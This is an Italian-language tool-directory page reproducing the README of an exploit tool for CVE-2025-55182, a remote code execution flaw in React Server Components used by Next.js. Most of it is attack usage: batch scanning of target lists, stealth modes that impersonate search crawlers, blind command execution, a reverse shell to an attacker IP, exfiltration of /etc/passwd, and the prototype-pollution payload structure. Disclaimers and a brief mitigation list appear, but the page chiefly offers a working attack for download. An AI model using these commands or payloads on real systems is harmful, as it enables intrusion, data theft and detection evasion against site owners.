Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-55182-exp — CVE-2025-55182 Tool di Exploit per l'Esecuzione Remota di Codice nei React Server Components | Kitploit
Strumenti/GitHubGitHub/spritualkb/cve-2025-55182-exp
Scanner di VulnerabilitàExploitSfruttamento di Applicazioni WebCTFPenetration TestingApprendimento e FormazioneRed TeamingStrumento di Accesso RemotoSviluppo Payload
GitHubspritualkb/cve-2025-55182-exp

CVE-2025-55182-exp

CVE-2025-55182 Tool di Exploit per l'Esecuzione Remota di Codice nei React Server Components

461279 mesi faRevisionato da Kitploit
Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2025-55182-exp

CVE Type Python License

🔥 Panoramica

CVE-2025-55182 è una vulnerabilità critica di Remote Code Execution (RCE) nei React Server Components (RSC) che colpisce le applicazioni Next.js che utilizzano App Router con Server Actions.

La vulnerabilità risiede nel processo di deserializzazione del protocollo Flight, consentendo agli attaccanti di ottenere l'esecuzione di codice arbitrario tramite prototype pollution.

⚠️ Disclaimer / Dichiarazione di non responsabilità

SOLO PER TEST DI SICUREZZA AUTORIZZATI

Questo strumento è fornito esclusivamente a scopo educativo e per test di penetrazione autorizzati. L'accesso non autorizzato a sistemi informatici è illegale. Qualsiasi uso illegale o non autorizzato di questo strumento è di esclusiva responsabilità dell'utente. L'autore non si assume alcuna responsabilità.

Questo strumento è destinato esclusivamente a test di sicurezza autorizzati e a fini educativi. In caso di violazioni o operazioni illegali, ogni conseguenza è a totale carico dell'utente; l'autore non è responsabile in alcun modo.

Si prega di leggere l'intero DISCLAIMER.md prima di utilizzare questo strumento.

Utilizzando questo strumento, accetti che:

  • Hai ottenuto la dovuta autorizzazione per qualsiasi test
  • Rispetterai tutte le leggi e le normative applicabili
  • Accetti la piena responsabilità delle tue azioni
  • L'autore non ha alcuna responsabilità per un uso improprio

📋 Versioni interessate

ComponentAffected Versions
react-server-dom-webpack19.0.0 - 19.2.0
Next.js15.x, 16.x (App Router + Server Actions)

🛠️ Installazione

# Clone the repository
git clone https://github.com/Spritualkb/CVE-2025-55182-exp.git
cd CVE-2025-55182-exp

# Install dependencies
pip install requests
pip install requests[socks]  # For SOCKS5 proxy support

📖 Utilizzo

Verifica di un singolo target

python3 exploit.py http://target:3000 --check

Scansione batch da file

# Basic batch scan
python3 exploit.py -f targets.txt --check

# With stealth mode and delay
python3 exploit.py -f targets.txt --check --stealth crawler --delay 2

# Save vulnerable targets to file
python3 exploit.py -f targets.txt --check -o vulnerable.txt

Esecuzione di un comando (RCE cieca)

python3 exploit.py http://target:3000 -c "id"

Reverse Shell

# Start listener first
nc -lvnp 4444

# Execute reverse shell
python3 exploit.py http://target:3000 --revshell 10.0.0.1 4444

Esfiltrazione dell'output di un comando

# Start listener
nc -lvnp 4444

# Execute and exfiltrate output
python3 exploit.py http://target:3000 --exfil "cat /etc/passwd" 10.0.0.1 4444

Utilizzo di un proxy

python3 exploit.py http://target:3000 --check --proxy socks5://127.0.0.1:1080

🎭 Modalità stealth

ModeDescription
browserSimula le richieste reali del browser (predefinita)
crawlerSimula i crawler dei motori di ricerca (Googlebot, Baiduspider, ecc.)
securityUtilizza User-Agents di scanner di sicurezza

🔧 Opzioni

OptionDescription
targetURL del target (ad es., http://localhost:3000)
-f, --fileFile contenente gli URL dei target (uno per riga)
-o, --outputFile di output per i target vulnerabili
-c, --commandComando da eseguire (cieco)
--checkVerifica la presenza della vulnerabilità
--proxyProxy SOCKS5 (ad es., socks5://127.0.0.1:1080)
--stealthModalità stealth: browser, crawler, security
--delayRitardo tra le richieste in secondi
--variantsUsa più varianti di payload per un controllo approfondito
--revshell IP PORTReverse shell verso IP:PORT
--exfil CMD IP PORTEsegue CMD e invia l'output a IP:PORT
-t, --timeoutTimeout della richiesta in secondi (predefinito: 15)

🔬 Dettagli tecnici

Meccanismo della vulnerabilità

Lo sfruttamento si basa sulla prototype pollution nella deserializzazione del protocollo Flight:

  1. Prototype Pollution: inquina Object.prototype.then tramite "$1:__proto__:then"
  2. Accesso al costruttore di Function: imposta _formData.get sul costruttore di Function tramite "$1:constructor:constructor"
  3. Iniezione di codice: inietta codice malevolo tramite _prefix che viene passato a Function()

Struttura del payload

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "<malicious_code>",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

📁 Struttura dei file

CVE-2025-55182-exp/
├── exploit.py      # Main exploit script
├── targets.txt     # Target URLs list (one per line)
└── README.md       # This file

📝 Formato di targets.txt

# Comments start with #
http://target1.com:3000
https://target2.com
target3.com:3000

🛡️ Mitigazione

  1. Aggiorna alle ultime versioni patchate di react-server-dom-webpack e Next.js
  2. Implementa la validazione degli input sulle Server Actions
  3. Utilizza regole Web Application Firewall (WAF) per rilevare payload malevoli del protocollo Flight
  4. Monitora la presenza di errori anomali lato server (HTTP 500) con messaggi legati alla prototype pollution

📜 Licenza

Questo progetto è distribuito sotto la licenza MIT - vedere il file LICENSE per i dettagli.


⚠️ Disclaimer legale / Dichiarazione di non responsabilità legale

Inglese

Termini di utilizzo

Scaricando, copiando, installando o utilizzando questo software, accetti di essere vincolato dai termini della presente dichiarazione.

Scopo previsto

Questo strumento è progettato esclusivamente per:

  • Test di penetrazione autorizzati
  • Ricerca e formazione sulla sicurezza
  • Valutazione delle vulnerabilità con la dovuta autorizzazione
  • Competizioni CTF (Capture The Flag)
  • Ambienti di laboratorio personali

Uso proibito

Non DEVI utilizzare questo strumento per:

  • Accesso non autorizzato a sistemi informatici
  • Qualsiasi attività illegale
  • Attaccare sistemi senza esplicita autorizzazione scritta
  • Causare danni a sistemi o dati
  • Qualsiasi attività che violi leggi locali, statali, nazionali o internazionali

Nessuna garanzia

QUESTO SOFTWARE È FORNITO "COSÌ COM'È" SENZA ALCUN TIPO DI GARANZIA, ESPRESSA O IMPLICITA. GLI AUTORI DECLINANO OGNI GARANZIA, INCLUSO, A TITOLO ESEMPLIFICATIVO:

  • COMMERCIABILITÀ
  • IDONEITÀ A UNO SCOPO PARTICOLARE
  • NON VIOLAZIONE DI DIRITTI ALTRUI

Limitazione di responsabilità

Scarica lo strumento